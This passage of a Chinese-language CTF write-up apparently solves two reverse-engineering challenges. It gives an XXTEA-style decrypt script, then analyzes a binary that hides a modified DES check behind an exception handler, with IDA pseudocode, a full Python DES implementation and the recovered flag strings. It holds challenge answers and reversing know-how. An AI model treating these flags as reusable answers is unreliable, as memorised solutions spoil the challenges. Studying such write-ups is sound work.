def decrypt(n, v, key):
    rounds = 6 + 52 // n

    total = c_uint32(rounds * delta)
    y = c_uint32(v[0])
    e = c_uint32(0)

    while rounds > 0:
        e.value = (total.value >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = c_uint32(v[p - 1])
            v[p] = c_uint32((v[p] - MX(z, y, total, key, p, e).value)).value
            y.value = v[p]
        z = c_uint32(v[n - 1])
        v[0] = c_uint32(v[0] - MX(z, y, total, key, 0, e).value).value
        y.value = v[0]
        total.value -= delta
        rounds -= 1

    return v


#  test
if __name__ == "__main__":
    # 该算法中每次可加密不只64bit的数据,并且加密的轮数由加密数据长度决定
    # 注意大小端, 方向错了没有
    delta = 0x33445566
    k = [3,2,1,4]
    res = [3665721207, 434595956, 2475253452, 3100922088, 329328895, 2689706231, 43194432, 3498298030]
    n = len(res)
    res = decrypt(n, res, k)
    print("Decrypted data is : ",)

    import struct
    for i in res:
        print(struct.pack("<I", i).decode(), end='')
    # 6fbf6171986aa1c63d19301070ef1a65

WuHen

分析,程序主动去触发divzero异常,说明有东西隐藏在异常。通过seh去找
start() -> scrt_common_main_seh() -> initterm((_PVFV *)&First, (_PVFV *)&Last); -> 进到First -> sub_7FF781AC1000 -> 7FF781AC2390

发现这里是一个DES算法。rand()是固定

  else if ( *(_QWORD *)(v2 + 16) == ptrMessageBoxTimeOutA )
  {
    v8 = 0;
    *(_QWORD *)(a1[1] + 72) = 0i64;
    qmemcpy(S1, "鏷-%嫋", 8);
    *(_DWORD *)&S1[12] = 0xD8A5EDAC;
    *(_DWORD *)&S1[16] = 0x23E71CCB;
    *(_DWORD *)&S1[20] = 0x169DDCDA;
    *(_DWORD *)&S1[24] = 0x2DFE7A0;
    *(_DWORD *)&S1[28] = 0x40CA83C;             // 8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04
    KEY[0] = rand();
    KEY[1] = rand();
    KEY[2] = rand();
    KEY[3] = rand();
    KEY[4] = rand();
    KEY[5] = rand();
    KEY[6] = rand();
    KEY[7] = rand();
    ka = *(_QWORD *)KEY;                        // 2923BE84E16CD6AE
    for ( i = 0i64; i != 32; i += 8i64 )
      *(_QWORD *)&In1[i] = Des(*(_QWORD *)&In1[i], ka);
    for ( j = 0i64; j != 32; ++j )
    {
      if ( In1[j] != S1[j] )
        break;
      ++v8;
    }
    if ( v8 == 32 )
      *(_QWORD *)(a1[1] + 136) = qword_7FF781AE2C10;
    return 0xFFFFFFFFi64;
  }

经过超级长的时间调试找到魔改点在循环左移处,改成了左移2,而且这个是小端的传值,都是反向处理一下。

        for j in range(step):
            t1 = d(tmp1) << 2 & 0xfffffff | d(tmp1) >> 26 & 1
            t2 = d(tmp2) << 2 & 0xfffffff | d(tmp2) >> 26 & 1
==> main.py <==
from des import Decryption

key = bytes.fromhex('2923BE84E16CD6AE')[::-1]

enclist = '8CCCBEB06422E7682D258B96ACEDA5D8CB1CE723DADC9D16A0E7DF023CA80C04'
for i in range(0, 64, 16):
    enc = bytes.fromhex(enclist[i:i + 16])[::-1]
    res = Decryption(enc, key)
    print(res[::-1].decode(),end='')
# fa7ac1027c833fb858dfff282c7443f0
==> CreateSubkey.py <==
MaxTime = 16
# 生成子密钥的置换表1,将64位的密钥转换为56位
key_table1 = [57, 49, 41, 33, 25, 17, 9,
              1, 58, 50, 42, 34, 26, 18,
              10, 2, 59, 51, 43, 35, 27,
              19, 11, 3, 60, 52, 44, 36,
              63, 55, 47, 39, 31, 23, 15,
              7, 62, 54, 46, 38, 30, 22,
              14, 6, 61, 53, 45, 37, 29,
              21, 13, 5, 28, 20, 12, 4]
# 生成子密钥的置换表2,将56位的密钥转换为48位
key_table2 = [14, 17, 11, 24, 1, 5,
              3, 28, 15, 6, 21, 10,
              23, 19, 12, 4, 26, 8,
              16, 7, 27, 20, 13, 2,
              41, 52, 31, 37, 47, 55,
              30, 40, 51, 45, 33, 48,
              44, 49, 39, 56, 34, 53,
              46, 42, 50, 36, 29, 32]
STEP_TABLE = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
d = lambda x: int(''.join(x), 2)


def Listmove(l, step):  # 将列表中的元素循环左移
    return l[step:] + l[:step]


def Subkey(key):  # 生成子密钥
    keyresult = []
    key0 = [0 for i in range(56)]

    for i in range(len(key_table1)):
        key0[i] = key[key_table1[i] - 1]

    # 生成16个密钥
    for i in range(MaxTime):
        key1 = [0 for i in range(48)]
        # 确定每次左移的步数
        step = STEP_TABLE[i]
        # if (i == 0 or i == 1 or i == 8 or i == 15):
        #     step = 1
        # else:
        #     step = 2
        # 分成两组
        tmp1 = key0[0:28]
        tmp2 = key0[28:56]
        # print(f'round: {i},', hex(int(''.join(tmp1), 2)), hex(int(''.join(tmp2), 2)))
        # 循环左移
        # tmp1 = Listmove(tmp1, step)
        # tmp2 = Listmove(tmp2, step)
        for j in range(step):
            t1 = d(tmp1) << 2 & 0xfffffff | d(tmp1) >> 26 & 1
            t2 = d(tmp2) << 2 & 0xfffffff | d(tmp2) >> 26 & 1
            tmp1 = list(f'{t1:028b}')
            tmp2 = list(f'{t2:028b}')

        # tmp1 = Listmove(tmp1, step*2)
        # tmp2 = Listmove(tmp2, step*2)
        # 左右连接
        key0 = tmp1 + tmp2
        # 置换选择
        for j in range(len(key_table2)):
            key1[j] = key0[key_table2[j] - 1]
        # 生成密钥
        # log(i, key1, tmp1, tmp2)
        keyresult.append(key1)
    # 返回的是一个集合包含了每次的密钥
    return keyresult


def log(i, key1, tmp1, tmp2):
    s = int(''.join(tmp1), 2)
    hex1 =int(''.join(tmp2), 2)
    hex2 = int(''.join(key1), 2)
    print(f'round: {i:02}, {s:08X} {hex1:08X} {hex2:016X}')

==> des.py <==
import CreateSubkey as cs
import F_function as f

# 十六进制转二进制比特串
Hex2bin = lambda m: [val for x in list(m) for val in f"{x:08b}"]

# 二进制比特串转十六进制
bin2Hex = lambda txt: bytes([int(''.join(txt[i:i + 8]), 2) for i in range(0, 64, 8)])


# 按照DES算法的流程图进行运算
def Encryption(plaintext, key):
    text = Hex2bin(plaintext)
    keybit = Hex2bin(key)

    keylist = cs.Subkey(keybit)
    text1 = f.IP(text, 0)  # IP置换
    L = text1[:32]
    R = text1[32:64]
    for i in range(16):
        tmp = R
        tmp = f.Extend(tmp)
        tmp = f.Xor(tmp, keylist[i])
        # print('xor:', hex(int(''.join(tmp), 2)))
        tmp = f.S_replace(tmp)
        # print('S:', hex(int(''.join(tmp), 2)))
        tmp = f.P_replace(tmp)
        # print('P:', hex(int(''.join(tmp), 2)))
        tmp = f.Xor(tmp, L)
        # print('pres ^ L:', hex(int(''.join(tmp), 2)))
        L = R
        R = tmp
    L, R = R, L
    ctext = L
    ctext.extend(R)
    ctext = f.IP(ctext, 1)
    return bin2Hex(ctext)


def Decryption(ptext, key):
    text = Hex2bin(ptext)
    keybit = Hex2bin(key)

    keylist = cs.Subkey(keybit)
    text1 = f.IP(text, 0)  # IP置换
    L = [text1[i] for i in range(32)]
    R = [text1[i] for i in range(32, 64)]
    for i in range(16):
        tmp = R
        tmp = f.Extend(tmp)
        tmp = f.Xor(tmp, keylist[15 - i])
        tmp = f.S_replace(tmp)
        tmp = f.P_replace(tmp)
        tmp = f.Xor(tmp, L)
        L = R
        R = tmp
    L, R = R, L
    ctext = L
    ctext.extend(R)
    ctext = f.IP(ctext, 1)
    return bin2Hex(ctext)

==> F_function.py <==
MaxTime = 16
# IP置换表 64Bytes
IP_table = [58, 50, 42, 34, 26, 18, 10, 2,
            60, 52, 44, 36, 28, 20, 12, 4,
            62, 54, 46, 38, 30, 22, 14, 6,
            64, 56, 48, 40, 32, 24, 16, 8,
            57, 49, 41, 33, 25, 17, 9, 1,
            59, 51, 43, 35, 27, 19, 11, 3,
            61, 53, 45, 37, 29, 21, 13, 5,
            63, 55, 47, 39, 31, 23, 15, 7]
# 逆IP置换表 64 Bytes
Inv_IP_table = [40, 8, 48, 16, 56, 24, 64, 32,
                39, 7, 47, 15, 55, 23, 63, 31,
                38, 6, 46, 14, 54, 22, 62, 30,
                37, 5, 45, 13, 53, 21, 61, 29,
                36, 4, 44, 12, 52, 20, 60, 28,
                35, 3, 43, 11, 51, 19, 59, 27,
                34, 2, 42, 10, 50, 18, 58, 26,
                33, 1, 41, 9, 49, 17, 57, 25]
# S盒 512 Bytes
# S盒中的S1盒 64Bytes
S1 = [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7,
      0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8,
      4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0,
      15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
# S盒中的S2盒
S2 = [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10,
      3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5,
      0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15,
      13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]
# S盒中的S3盒
S3 = [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8,
      13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1,
      13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7,
      1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]
# S盒中的S4盒
S4 = [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15,
      13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9,
      10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4,
      3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]
# S盒中的S5盒
S5 = [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9,
      14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6,
      4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14,
      11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]
# S盒中的S6盒
S6 = [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11,
      10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8,
      9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6,
      4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]
# S盒中的S7盒
S7 = [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1,
      13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6,
      1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2,
      6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]
# S盒中的S8盒
S8 = [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7,
      1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2,
      7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8,
      2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]
# S盒 512 Bytes
S = [S1, S2, S3, S4, S5, S6, S7, S8]
# 用于对数据进行扩展置换,将32bit数据扩展为48bit
extend_table = [32, 1, 2, 3, 4, 5,
                4, 5, 6, 7, 8, 9,
                8, 9, 10, 11, 12, 13,
                12, 13, 14, 15, 16, 17,
                16, 17, 18, 19, 20, 21,
                20, 21, 22, 23, 24, 25,
                24, 25, 26, 27, 28, 29,
                28, 29, 30, 31, 32, 1]
# P盒 32 Bytes
P_table = [16, 7, 20, 21, 29, 12, 28, 17,
           1, 15, 23, 26, 5, 18, 31, 10,
           2, 8, 24, 14, 32, 27, 3, 9,
           19, 13, 30, 6, 22, 11, 4, 25]


def int2bit(n):  # 0~15整数转比特
    a = []
    for i in range(0, 4):
        a.insert(0, str(n % 2))
        n = int(n / 2)
    return a


# IP置换部分,op为0表示正置换,op为1表示逆置换
def IP(text, op):
    tmp = [0 for i in range(64)]
    if op == 0:
        for i in range(64):
            tmp[i] = text[IP_table[i] - 1]
        return tmp
    if op == 1:
        for i in range(64):
            tmp[i] = text[Inv_IP_table[i] - 1]
        return tmp


# 进行扩展,将32位扩展为48位
def Extend(text):
    extend = [0 for i in range(48)]
    for i in range(48):
        extend[i] = text[extend_table[i] - 1]
    return extend


# S盒变换部分
def S_replace(text):
    Sresult = [0 for k in range(32)]
    for k in range(8):
        row = 2 * int(text[k * 6]) + int(text[k * 6 + 5])
        column = 8 * int(text[k * 6 + 1]) + 4 * int(text[k * 6 + 2]) + 2 * int(text[k * 6 + 3]) + int(text[k * 6 + 4])
        tmp = S[k][row * 16 + column]

        for i in range(4):
            Sresult[4 * k + i] = int2bit(tmp)[i]
    return Sresult


# P置换部分
def P_replace(text):
    Presult = [0 for i in range(32)]
    for i in range(32):
        Presult[i] = text[P_table[i] - 1]
    return Presult


# 异或运算
def Xor(bit1, bit2):
    Xorresult = [0 for i in range(len(bit1))]
    for i in range(len(bit1)):
        Xorresult[i] = str(int(bit1[i]) ^ int(bit2[i]))
    return Xorresult
posted @ 2022-04-21 19:54  wgf4242  阅读(383)  评论(0编辑  收藏  举报